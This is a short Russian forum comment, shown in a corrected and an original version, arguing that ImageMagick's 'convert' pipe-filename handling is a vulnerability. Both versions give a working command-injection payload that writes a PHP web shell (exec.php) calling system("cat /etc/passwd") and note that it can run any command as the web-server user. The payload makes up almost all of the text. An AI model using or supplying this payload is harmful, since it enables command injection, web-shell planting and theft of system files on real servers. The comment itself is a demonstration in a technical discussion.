Исправление soko1, (текущая версия) :
Конечно уязвимость. Подставь например вместо
convert '|echo Hello > hello.txt;' null:
Вот это:
convert '| echo "<?php system(\"cat /etc/passwd\"); ?>" > exec.php;' null:
и вызови через браузер exec.php - получишь содержимое /etc/passwd (или любую другую команду под пользователем веб-сервера).
Исходная версия soko1, :
Конечно уязвимость. Подставь например вместо
convert '|echo Hello > hello.txt;' null:
Вот это:
convert '| echo "<?php system(\"cat /etc/passwd\"); ?>" > exec.php;' null:
и вызови через браузер exec.php - получишь содержимое /etc/passwd.